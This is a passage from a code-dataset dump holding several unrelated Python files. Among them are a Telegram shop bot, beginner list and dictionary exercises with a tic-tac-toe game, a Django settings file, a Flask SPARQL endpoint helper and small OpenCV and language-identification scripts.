str(updater.callback_query.data).split(\" \")[1]\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n GetProductsFromUser(updater, context, \"product \" + result)\n\ndef SelectedProduct(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n result = str(updater.callback_query.data).split(\" \")\n\n if result[1] == \"return\":\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n GetProductsFromUser(updater, context, \"types\")\n\n else:\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n Worker(\"tg\").AddInUserBuscetProduct(data[\"user_id\"], result[1])\n msg_text = Core.GetRandomLocalizationString(locate, \"ProductAdded\")\n msg_text = msg_text.format(Core.GetLocalizationProductName(locate, result[2]))\n\n history_order = KeyboardButton(Core.GetRandomLocalizationString(locate, \"HistoryOrder\"))\n markup = ReplyKeyboardMarkup([[history_order]], resize_keyboard=True, one_time_keyboard=True)\n\n if Worker(\"tg\").UserHaveProductsInBascet(data[\"user_id\"]):\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text, reply_markup=markup)\n else:\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n GetProductsFromUser(updater, context, \"product \" + result[3])\n\n\ndef GetProductsFromUser(updater, context, type_data):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n msg_text = \"Ничего нет из известного(\"\n btns = []\n\n if type_data == \"types\":\n SetStateUser(data[\"user_id\"], \"view_product_types\")\n temp_data_tables = Worker(\"tg\").GetProductsType()\n for row in temp_data_tables:\n text_btn = Core.GetLocalizationProductsType(locate, str(row[1]))\n btns.append([InlineKeyboardButton(text=text_btn, callback_data=\"product_types \" + str(row[0]))])\n\n if type_data.startswith(\"product\"):\n SetStateUser(data[\"user_id\"], \"selected_product_types_\" + type_data.split(\" \")[1])\n temp_data_tables = Worker(\"tg\").GetProductsForType(type_data.split(\" \")[1])\n for row in temp_data_tables:\n text_btn = Core.GetLocalizationProductName(locate, str(row[1]))\n btns.append([InlineKeyboardButton(text=text_btn, callback_data=\"product {} {} {}\".format(str(row[0]), str(row[1]), str(row[2])) )])\n\n btns.append([InlineKeyboardButton(text=Core.GetRandomLocalizationString(locate, \"Return\"), callback_data=\"product return\")])\n\n if len(btns) > 0:\n markup = InlineKeyboardMarkup(btns)\n if type_data == \"types\":\n msg_text = Core.GetRandomLocalizationString(locate, \"SelectProductsType\")\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text, reply_markup=markup)\n return\n elif type_data.startswith(\"product\"):\n msg_text = Core.GetRandomLocalizationString(locate, \"SelectProduct\")\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text, reply_markup=markup)\n return\n\n # if error\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n\ndef GetOrders(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n dataOrder = Worker(\"tg\").GetUserOrder(data[\"user_id\"])\n\n msg_text = \"У вас в корзмне:\\n\"\n for dataProduct in dataOrder:\n msg_text += Core.GetLocalizationProductName(locate, str(dataProduct[1])) + \"\\n\"\n\n markup = InlineKeyboardMarkup([\n [InlineKeyboardButton(text=\"Заказать\", callback_data=\"send_order buy\")],\n [InlineKeyboardButton(text=\"Очистить\", callback_data=\"send_order clear\")],\n [InlineKeyboardButton(text=\"Вернутся\", callback_data=\"send_order return\")]\n ])\n\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text, reply_markup=markup)\n\ndef TreatmentOrders(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n result = str(updater.callback_query.data).split(\" \")\n msg_text = \"\"\n\n if result[1] == \"return\":\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n GetProductsFromUser(updater, context, \"types\")\n elif result[1] == \"clear\":\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n msg_text = \"Ваша карзина очищена\"\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n context.bot.send_chat_action(chat_id=data[\"chat_id\"], action=telegram.ChatAction.TYPING)\n time.sleep(1)\n GetProductsFromUser(updater, context, \"types\")\n elif result[1] == \"buy\":\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n msg_text = \"Заказ оформлен\"\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n\n\n#functions from add\n\ndef AddProductsType(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n temd_data = data[\"msg_text\"].replace(\"/AddProductsType\", \"\").strip().split(\" \")\n try:\n key = temd_data[0]\n name = temd_data[1]\n Worker(\"tg\").AddProductsType(userId=data[\"user_id\"], key=key, name=name, locate=locate)\n except Exception as ex:\n Core.WriteErrorMes(ex.args[0])\n\ndef AddProduct(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n temd_data = data[\"msg_text\"].replace(\"/AddProduct\", \"\").strip().split(\" \")\n try:\n key = temd_data[0]\n name = temd_data[1].replace(\"_\", \" \")\n category = temd_data[2]\n Worker(\"tg\").AddProduct(userId=data[\"user_id\"], key=key, name=name, category=category, locate=locate)\n except Exception as ex:\n Core.WriteErrorMes(ex.args[0])\n\n#functions from tests\ndef TestButtons(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n temd_data = data[\"msg_text\"].replace(\"/TestButtons\", \"\").strip().split(\" \")\n count = temd_data[0]\n\n btnsList = []\n for i in range(0, int(count)):\n btnsList.append([InlineKeyboardButton(text=\"Кнопка\" + str(i), callback_data=\"test btn\" + str(i))])\n\n markup = InlineKeyboardMarkup(btnsList)\n text = \"Тестируем количество кнопок\"\n\n context.bot.send_message(text=text, chat_id=data[\"chat_id\"], reply_markup=markup)\n\n\n","sub_path":"PerfectProject/Erie/telegram_core/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":14379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"594580679","text":"import string\ndata=open(\"A-large.in\",\"r\")\ns1=data.read()\ns1=s1.split(\"\\n\")\nt=int(s1[0])\nfor i in range(1,t+1):\n\tn=int(s1[i])\n\tif(n==0):\n\t\tprint(\"Case #{0}: INSOMNIA\".format(i))\n\t\tcontinue\n\ts=str(n)\n\tc=0\n\tl=[0 for j in range(10)]\n\tm=1\n\twhile (True):\n\t\ts=str(n*m)\n\t\tfor j in s:\n\t\t\tk = int(j)\n\t\t\tif(l[k]==0):\n\t\t\t\tl[k]=1\n\t\t\t\tc+=1\n\t\t\tif(c==10):\n\t\t\t\tbreak\n\t\tif(c==10):\n\t\t\tbreak\n\t\telse:\n\t\t\tm+=1\n\tif(c==10):\n\t\tprint(\"Case #{0}: {1}\".format(i,n*m))\n\n\n","sub_path":"codes/CodeJamCrawler/CJ/16_0_1_adarshpandey_codejam1.py","file_name":"16_0_1_adarshpandey_codejam1.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"635624854","text":"# There is no check for a draw in tic-tac-toe\n# nice work on the game though.\n# There are some places where the code could be more efficient. Particularly in the checks. You check both x and o for every combination.\n# Think about the DRY principle.\n# It would be easier to send the player (x or o) to the check. This would be easier than copy paste and adding unnecessary lines of code and conditional checks. \n\n# LISTS (35PTS TOTAL)\n# In these exercises you write functions. Of course, you should not only write the functions,\n# you should also write code to test them. For practice, you should also comment your\n# functions as explained above.\nimport random\n\n# PROBLEM 1 (8-ball - 5pts)\n# A magic 8-ball, when asked a question, provides a random answer from a list.\n# The code below contains a list of possible answers. Create a magic 8-ball program that\n# prints a random answer.\nanswer_list = [\"It is certain\", \"It is decidedly so\", \"Without a \\\ndoubt\", \"Yes, definitely\", \"You may rely on it\", \"As I see it, \\\nyes\", \"Most likely\", \"Outlook good\", \"Yes\", \"Signs point to yes\",\n \"Reply hazy try again\", \"Ask again later\", \"Better not tell you \\\nnow\", \"Cannot predict now\", \"Concentrate and ask again\", \"Don ' t \\\ncount on it\", \"My reply is no\", \"My sources say no\", \"Outlook \\\nnot so good\", \"Very doubtful\"]\n\n\ndef magicball():\n question = input(\"Ask the magic ball anything: \")\n if question:\n print(answer_list[random.randrange(len(answer_list))])\n\n\nmagicball()\n\n\n\n\n\n# PROBLEM 2 (Shuffle - 5pts)\n# A playing card consists of a suit (Heart, Diamond, Club, Spade) and a value (2,3,4,5,6,7,8,9,10,J,Q,K,A).\n# Create a list of all possible playing cards, which is a deck.\n# Then create a function that shuffles the deck, producing a random order.\ndef deckprinter():\n suit = [\"Heart\", \"Diamond\", \"Club\", \"Spade\"]\n value = []\n deck = []\n for i in range(2, 11):\n value.append(i)\n value.extend([\"J\", \"Q\", \"K\", \"A\"])\n\n for i in range(13):\n for j in range(4):\n deck.append(str(value[i]) + \" of \" + str(suit[j]))\n for i in range(52):\n deck[i] = deck[random.randrange(1, 52)]\n print(deck)\n\n\ndeckprinter()\n\n\n# PROBLEM 3 (The sieve of Eratosthenes - 10pts)\n# The sieve of Eratosthenes is a method to find all prime numbers between\n# 1 and a given number using a list. This works as follows: Fill the list with the sequence of\n# numbers from 1 to the highest number. Set the value of 1 to zero, as 1 is not prime.\n# Now loop over the list. Find the next number on the list that is not zero,\n# which, at the start, is the number 2. Now set all multiples of this number to zero.\n# Then find the next number on the list that is not zero, which is 3.\n# Set all multiples of this number to zero. Then the next number, which is 5\n# (because 4 has already been set to zero), and do the same thing again.\n# Process all the numbers of the list in this way. When you have finished,\n# the only numbers left on the list are primes.\n# Use this method to determine all the primes between 1 and 1000.\n\ndef eras(n):\n number_list = []\n new_list = []\n\n for i in range(1, n + 1):\n number_list.append(i)\n number_list[0] = 0\n for i in range(1, len(number_list)):\n if number_list[i] != 0:\n new_list.append(number_list[i])\n for j in range(i + 1, len(number_list)):\n if number_list[j] % number_list[i] == 0:\n number_list[j] = 0\n print(new_list)\n\n\n# eras(1000)\n\n\n\n# PROBLEM 4 (Tic-Tac-Toe - 15pts)\n# Write a Tic-Tac-Toe program that allows two people to play the game against each other.\n# In turn, ask each player which row and column they want to play.\n# Make sure that the program checks if that row/column combination is empty.\n# When a player has won, end the game.\n# When the whole board is full and there is no winner, announce a draw.\n# This is a fairly long program to write (60 lines or so).\n# It will definitely help to use some functions.\n# I recommend that you create a function display_board() that gets the board\n# as parameter and displays it,\n# a function get_row_column() that asks for a row or a column (depending on a parameter)\n# and checks whether the user entered a legal value,\n# and a function winner() that gets the board as argument and checks if there is a winner.\n# Keep track of who the current player is using a global variable player that you can\n# pass to a function as an argument if the function needs it.\n# I also use a function opponent(), that takes the player as argument and returns\n# the opponent. I use that to switch players after each move.\nboard = [[\" \", \" \", \" \"], [\" \", \" \", \" \"], [\" \", \" \", \" \"]]\n\n\ndef show_board():\n print(\" \", board[0][0], \"|\", board[1][0], \"|\", board[2][0])\n print(\"--------------\")\n print(\" \", board[0][1], \"|\", board[1][1], \"|\", board[2][1])\n print(\"--------------\")\n print(\" \", board[0][2], \"|\", board[1][2], \"|\", board[2][2])\n\n\ndef win_check():\n if board[0][0] == board[1][0] == board[2][0] == \"X\" :\n print(\"X Wins\")\n return 1\n elif board[0][0] == board[1][0] == board[2][0] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][1] == board[1][1] == board[2][1] == \"X\" :\n print(\"X wins\")\n return 1\n elif board[0][1] == board[1][1] == board[2][1] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][2] == board[1][2] == board[2][2] == \"X\":\n print(\"X wins\")\n return 1\n elif board[0][2] == board[1][2] == board[2][2] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][0] == board[1][1] == board[2][2] == \"X\":\n print(\"X wins\")\n return 1\n elif board[0][0] == board[1][1] == board[2][2] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][2] == board[1][1] == board[2][0] == \"X\":\n print(\"X wins\")\n return 1\n elif board[0][2] == board[1][1] == board[2][0] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][0] == board[0][1] == board[0][2] == \"X\":\n print(\"X wins\")\n return 1\n elif board[0][0] == board[0][1] == board[0][2] == \"O\":\n print(\"O wins\")\n return 1\n elif board[1][0] == board[1][1] == board[1][2] == \"X\":\n print(\"X wins\")\n return 1\n elif board[1][0] == board[1][1] == board[1][2] == \"O\":\n print(\"O wins\")\n return 1\n elif board[2][0] == board[2][1] == board[2][2] == \"X\":\n print(\"X wins\")\n return 1\n elif board[2][0] == board[2][1] == board[2][2] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][0] != board[1][0] != board[2][0] != board[0][1] != board[1][1] != board[2][1] != board[0][2] != \\\n board[1][2] != board[2][2]:\n print(\"Tie\")\n return 1\n\n\ndef mainfunc():\n i = 0\n done = False\n '''\n def choose(i):\n m=0\n row = input(\"Choose your row: \")\n row = int(row)\n colum = input(\"Choose your column: \")\n colum = int(colum)\n if (row <= 3 > 0) and (colum <= 3 > 0):\n if board[colum - 1][row - 1] != \"X\" and board[colum - 1][row - 1] != \"O\":\n if i % 2 == 0:\n board[colum - 1][row - 1] = \"X\"\n else:\n board[colum - 1][row - 1] = \"O\"\n show_board()\n\n else:\n print(\"Sorry the spot is taken\")\n i-=1\n else:\n print(\"Sorry that point does not exist\")\n i-=1\n return i\n '''\n while not done:\n win_check()\n win = win_check()\n if win == 1:\n done = True\n\n i += 1\n row = input(\"Choose your row: \")\n row = int(row)\n colum = input(\"Choose your column: \")\n colum = int(colum)\n if (row <= 3 > 0) and (colum <= 3 > 0):\n if board[colum - 1][row - 1] != \"X\" and board[colum - 1][row - 1] != \"O\":\n if i % 2 == 0:\n board[colum - 1][row - 1] = \"X\"\n else:\n board[colum - 1][row - 1] = \"O\"\n show_board()\n\n else:\n print(\"Sorry the spot is taken\")\n i -= 1\n else:\n print(\"Sorry that point does not exist\")\n i -= 1\n\n\n\n\nmainfunc()\n\n\n# The main program will be something along the lines of (in pseudo-code):\n# display board\n# while True:\n# ask for row\n# ask for column\n# if row/column already occupied:\n# display error\n# place player marker in row/col\n# display board\n# check for winner:\n# announce winner\n# break\n# check board full:\n# announce draw\n# break\n# switch player\n\n# CHALLENGE PROBLEM 5 (Battleship NO CREDIT, JUST IF YOU WANT TO TRY IT)\n# Create a program that is a simplified version of the game “Battleship.”\n# The computer creates (in memory) a grid that is 4 cells wide and 3 cells high.\n# The rows of the grid are numbered 1 to 3, and the columns of the grid are labeled A to D.\n# The computer hides a battleship in three random cells in the grid.\n# Each battleship occupies exactly one cell.\n# Battleships are not allowed to touch each other horizontally or vertically.\n# Make sure that the program places the battleships randomly, so not pre-configured.\n# The computer asks the player to “shoot” at cells of the grid.\n# The player does so by entering the column letter and row number of the cell\n# which she wants to shoot at (e.g., \"D3\").\n# If the cell which the player shoots at contains nothing, the computer responds with “Miss!”\n# If the cell contains a battleship, the computer responds with “You sunk my battleship!”\n# and removes the battleship from the cell (i.e., a second shot at the same cell is a miss).\n# As soon as the player hits the last battleship, the computer responds with displaying\n# how many shots the player needed to shoot down all three battleships, and the program ends.\n# To help with debugging the game, at the start the computer should display the grid with\n# O's marking empty cells and X's marking cells with battleships.\n# Hint: If you have troubles with this exercise, start by using a board which has the\n# battleships already placed.\n# Once the rest of the code works, add a function that places the battleships at random,\n# at first without checking if they are touching one another.\n# Once that works, add code that disallows battleships touching each other.\n","sub_path":"Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":10433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"284375906","text":"person = {'first_name': 'Calvin','last_name': 'Howe','age': 12,'city': 'Kansas City'}\n\nprint(person['first_name'])\nprint(person['last_name'])\nprint(person['age'])\nprint(person['city'])\n\n\nnumbers = {'Calvin': [20,12,6,8,10],'geoffrey': [2,0],'lily': [12],'john': [13,100,20],'brandon': [10]}\n\nprint(f\"\\nCalvin's favorite numbers are {numbers['Calvin']}.\")\nprint(f\"\\ngeoffrey's favorite numbers are {numbers['geoffrey']}.\")\nprint(f\"\\nlily's favorite numbers are {numbers['lily']}.\")\nprint(f\"\\njohn's favorite numbers are {numbers['john']}.\")\nprint(f\"\\nbrandon's favorite numbers are {numbers['brandon']}.\")\n\n\npy_words = {'print': 'print shows the output.','for loop':\n 'for loops loop through the values of a list.','list':\n 'A list is a group of data.','variables':\n 'A variable represents a piece of data.','python':\n 'python is a type of programing.','dictionary':\n 'A dictionary is another way of storing data.','del':\n 'del deletes elements of a list.','insert':\n 'insert puts values into a list.','title':\n 'title is how you make things uppercase.', 'comment':\n 'A comment lets you write notes in English'}\n\n\nfor key, value in py_words.items():\n print(f\"\\nWord: {key}\")\n print(f\"Meaning: {value}\")\n\nrivers_of_the_world = {'Nile': 'Egypt','Amazon': 'Brazil','Mississipie': 'USA'}\nfor k in rivers_of_the_world:\n if k == 'Nile':\n print('\\nThe Nile runs through Egypt')\n if k == 'Amazon':\n print('\\nThe Amazon might be the longest river in the world.')\n if k == 'Mississipie':\n print('\\nThe Mississipie is slow, but wide.')\n\nfor river in rivers_of_the_world.keys():\n print(river)\n\nfor country in rivers_of_the_world.values():\n print(country)\n\n\npolled_people = ['jen', 'prim', 'samuel', 'harry', 'john']\n\nfavorite_languages = {\n 'jen': 'python',\n 'sarah': 'c',\n 'edward': 'ruby',\n 'phil': 'python'\n }\n\nfor people in polled_people:\n if people in favorite_languages:\n print('Thank you for responding.')\n else:\n print('Please take our poll.')\n\nperson = {'first_name': 'Calvin','last_name': 'Howe','age': 12,'city': 'Kansas City'}\nperson_2 = {'first_name': 'Frodo','last_name': 'Baggins','age': 51,'city':'Hobbiton'}\nperson_3 = {'first_name': 'Martin','last_name': 'Howe','age': 3,'city': 'Kansas City'}\n\npeoples = [person, person_2, person_3]\n\nfor people in peoples:\n print(people)\n\npet = {'type': 'panther','owner': \"Drizzt Do'Urden\",'name': 'Guenhaver'}\npet_2 = {'type': 'brown bear','owner': 'Anna','name': 'Wojtek'}\npet_3 = {'type': 'wolf','owner': 'Gunter','name': 'Nacht'}\n\npets = [pet, pet_2, pet_3]\n\nfor pet in pets:\n print(pet)\n\n\nnumbers = {'Calvin': [5, 20, 12, 6, 8, 10],\n 'geoffrey': [2, 0],\n 'lily': [12],\n 'john': [13, 100, 20],\n 'brandon': [10]}\n\nprint(f\"\\nCalvin's favorite numbers are {numbers['Calvin']}.\")\nprint(f\"\\ngeoffrey's favorite numbers are {numbers['geoffrey']}.\")\nprint(f\"\\nlily's favorite numbers are {numbers['lily']}.\")\nprint(f\"\\njohn's favorite numbers are {numbers['john']}.\")\nprint(f\"\\nbrandon's favorite numbers are {numbers['brandon']}.\")\n\ncities = {'city_one':\n {'name': 'Crete',\n 'pop': 'unknown',\n 'country': 'Greece',\n 'fact': 'Crete is the home of the minotaur in Greek myths.'},\n 'city_two': {'name': 'Athens',\n 'pop': 'unknown',\n 'country': 'Greece',\n 'fact': 'The Greek hero Theseus ousted Medea here.'},\n 'city_three':{'name': 'Thebes',\n 'pop': 'unknown',\n 'country': 'Greece',\n 'fact': 'The city was founded when a cow died, marking the spot.'}}\n\nprint(f\"\\n{cities['city_one']}\")\nprint(f\"\\n{cities['city_two']}\")\nprint(f\"\\n{cities['city_three']}\")\n\n","sub_path":"python_crash_course/calvin/basics/dictonarys.py","file_name":"dictonarys.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"355247392","text":"import pickle\nimport numpy as np\nfrom languageIdentificationInputPreprocessing import LanguageIdentificationPreprocessing\nclass LanguageIdentifier:\n def __init__(self):\n self.model = pickle.load(open('models/final_languageIdentification.pkl', 'rb'))\n self.vectorizer = pickle.load(open(\"models/vectorizer.pkl\", 'rb'))\n self.pre = LanguageIdentificationPreprocessing()\n\n def languageIdentification(self, text):\n # removing emails\n x_input = self.pre.remove_emails(text)\n\n # removing URLs\n x_input = self.pre.remove_url(x_input)\n\n # remove special characters\n x_input = self.pre.remove_special_characters(x_input)\n\n # remove accented characters\n x_input = self.pre.remove_accented_chars(x_input)\n\n # remove extra spaces\n x_input = self.pre.remove_extra_spaces(x_input)\n\n # convert to lower case\n x_input = self.pre.convert_to_lowercase(x_input)\n\n word_list = x_input.split()\n\n\n # remove the same letter repeating for more than twice\n x_input = x_input.replace(x_input, self.pre.remove_consecutives(word_list))\n\n # vectorized using the pickled vectorizor\n x_inputting = self.vectorizer.transform([x_input])\n\n # predict the class labels using the pickled model\n prediction = np.array2string(self.model.predict(x_inputting))\n\n return prediction\n\n\n","sub_path":"languageIdentification.py","file_name":"languageIdentification.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"342953422","text":"__author__ = 'geekscruff'\n\n\"\"\"This class is used to create endpoints of different types. Currently only sparql is supported.\"\"\"\n\nfrom flask import Flask\nimport endpoint_creator\nimport os\nimport logging\n\n# Global variables\nlogger = logging.getLogger(__name__)\napp = Flask(__name__)\n\nclass Endpoint:\n def __init__(self, ep):\n logger.debug(\"DEBUG endpoint.py - object instantiated\")\n self.ep = ep\n self.details = \"\"\n\n if os.path.isfile('/opt/peoplesparql/config.py'):\n logger.info(\"INFO endpoint.py - loaded production config\")\n app.config.from_pyfile('/opt/peoplesparql/config.py', silent=False)\n else:\n logger.info(\"INFO endpoint.py - loaded local config\")\n app.config.from_object('peoplesparql')\n\n # Used for new endpoints, although if the endpoint does exist in the repository, that's fine.\n def setup_new_sparql_endpoint(self, name):\n try:\n ep = endpoint_creator.EndpointCreator(self.ep, app.config['AG_DATASOURCES'])\n ep.setname(name)\n results = ep.docreate()\n logger.debug(\"DEBUG endpoint.py - results from endpoint created returned\")\n return results\n except ValueError as e:\n logger.error(\"ValueError endpoint.py - \" + e.message)\n raise ValueError(e.message)\n except Exception as e:\n logger.error(\"ERROR! endpoint.py - \" + e.message)\n raise Exception(e.message)\n\n # Used for endpoints we believe are already in the repository, although if they aren't, that's fine.\n def setup_existing_sparql_endpoint(self):\n try:\n results = endpoint_creator.EndpointCreator(self.ep, app.config['AG_DATASOURCES']).docreate()\n logger.debug(\"DEBUG endpoint.py - results from endpoint created returned\")\n return results\n except ValueError as e:\n logger.error(\"ValueError endpoint.py -- \" + e.message)\n raise ValueError(e.message)\n except Exception as e:\n logger.error(\"ERROR! endpoint.py -- \" + e.message)\n raise Exception(e.message)\n\n def setdetails(self, d):\n logger.debug(\"DEBUG endpoint.py - store the JSON results\")\n self.details = d\n\n def getdetails(self):\n logger.debug(\"DEBUG endpoint.py - return the endpoint details as JSON results\")\n return self.details\n","sub_path":"queryandexplore/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"541489317","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom environ import Env\nfrom raven import fetch_git_sha\nfrom raven.exceptions import InvalidGitRepository\n\nfrom django.utils.translation import ugettext_lazy as _\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nassert os.path.isfile(os.path.join(BASE_DIR, 'manage.py'))\n\nenv = Env()\nenv.read_env(os.path.join(BASE_DIR, '.env'))\n\nDEBUG = env.bool('DEBUG', default=True)\nSECRET_KEY = env.str('SECRET_KEY', default=('' if not DEBUG else 'xxx'))\ndefault_var_root = os.path.join(BASE_DIR, 'var')\nVAR_ROOT = env.str('VAR_ROOT', default_var_root)\n\nif not os.path.isdir(VAR_ROOT):\n print('Creating var root %s' % VAR_ROOT)\n os.makedirs(VAR_ROOT)\n\ndefault_database_url = 'sqlite:///%s' % os.path.join(VAR_ROOT, 'db.sqlite3').replace(os.sep, '/')\n\nDATABASES = {\n 'default': env.db_url(\n default=default_database_url\n )\n}\n\nINSTALLED_APPS = [\n 'djangocms_admin_style',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'cms',\n 'treebeard',\n 'menus',\n 'sekizai',\n 'easy_thumbnails',\n 'filer',\n 'mptt',\n 'djangocms_text_ckeditor',\n 'cmsplugin_filer_file',\n 'cmsplugin_filer_folder',\n 'cmsplugin_filer_link',\n 'cmsplugin_filer_image',\n 'cmsplugin_filer_teaser',\n 'workbench',\n]\n\nMIDDLEWARE_CLASSES = [\n 'cms.middleware.utils.ApphookReloadMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'cms.middleware.user.CurrentUserMiddleware',\n 'cms.middleware.page.CurrentPageMiddleware',\n 'cms.middleware.toolbar.ToolbarMiddleware',\n 'cms.middleware.language.LanguageCookieMiddleware',\n]\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'sekizai.context_processors.sekizai',\n 'cms.context_processors.cms_settings',\n ],\n },\n },\n]\n\nALLOWED_HOSTS = ['*']\nCMS_TEMPLATES = (\n ('workbench/page.html', _(u'Etusivu')),\n)\nCMS_PLACEHOLDER_CONF = {\n # Docs: http://docs.django-cms.org/en/latest/reference/configuration.html#cms-placeholder-conf\n}\nFILER_CANONICAL_URL = 'share/'\nFILER_IMAGE_USE_ICON = True\nLANGUAGE_CODE = 'fi'\nLANGUAGES = [\n ('fi', 'Suomi'),\n]\nMEDIA_ROOT = os.path.join(VAR_ROOT, 'media')\nMEDIA_URL = '/media/'\nROOT_URLCONF = 'workbench.urls'\nSITE_ID = 1\nSTATIC_ROOT = os.path.join(VAR_ROOT, 'static')\nSTATIC_URL = '/static/'\nTHUMBNAIL_HIGH_RESOLUTION = True # http://django-filer.readthedocs.io/en/latest/installation.html#configuration\nTHUMBNAIL_PROCESSORS = (\n 'easy_thumbnails.processors.colorspace',\n 'easy_thumbnails.processors.autocrop',\n 'filer.thumbnail_processors.scale_and_crop_with_subject_location',\n 'easy_thumbnails.processors.filters',\n)\nTIME_ZONE = 'Europe/Helsinki'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nWSGI_APPLICATION = 'workbench.wsgi.application'\n\nvars().update(env.email_url(\n default=('consolemail://' if DEBUG else 'smtp://localhost:25')\n))\n","sub_path":"workbench/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"149405368","text":"import cv2\r\nimport numpy as np\r\n\r\nimage = cv2.imread(\"gtr.jpg\")\r\ncv2.imshow(\"original\", image)\r\n\r\nprint (image.shape) #row,col,channels\r\n\r\nLframe1 = image[0:720, 0:400]\r\nCframe1 = image[0:720, 400:880]\r\nRframe1 = image[0:720,880:1280]\r\n\r\n(h,w) = Lframe1.shape[:2]\r\ncenter=(w/2,h/2)\r\nM = cv2.getRotationMatrix2D(center, 180, 1.0)\r\nLframe1flip = cv2.warpAffine(image[0:720, 0:400], M, (w,h))\r\n \r\nputitback = np.concatenate((Lframe1flip,Cframe1, Rframe1), axis=1)\r\ncv2.imshow('flipped',Lframe1flip) \r\ncv2.imshow('cropped',Rframe1) \r\ncv2.imshow('stitched',putitback)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"cropcv.py","file_name":"cropcv.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"440706780","text":"#!/usr/bin/env python3\r\n\r\nimport csv\r\n#from website_example import first_gate, last_gate, gate_num, line\r\n\r\nclass SGDiscrete:\r\n def __init__(self, first_gate, last_gate, gate_number, conveyor_type, line):\r\n conveyor_types = {\"Distribution\": \"D\", \"Transfer\": \"T\", \"Accumulation\": \"A\", \"Weigher Feeder\": \"WF\", \"Modulation\": \"X\"}\r\n self.first_gate = first_gate\r\n self.last_gate = last_gate\r\n self.gate_number = gate_number\r\n self.conveyor_type = conveyor_type\r\n self.conveyor_type_letter = conveyor_types[conveyor_type]\r\n self.line = line\r\n\r\n\r\n def features(self):\r\n \"\"\"Features for IO Discrete Tags\"\"\"\r\n dict_data = []\r\n my_dict = {\r\n \":IODisc\":\"\",\r\n \"Group\": \"$System\",\r\n \"Comment\": \"\",\r\n \"Logged\": \"No\",\r\n \"EventLogged\": \"No\",\r\n \"EventLoggingPriority\": 0,\r\n \"RetentiveValue\": \"No\",\r\n \"InitialDisc\": \"Off\",\r\n \"OffMsg\": \"\",\r\n \"OnMsg\": \"\",\r\n \"AlarmState\": \"None\",\r\n \"AlarmPri\": 1,\r\n 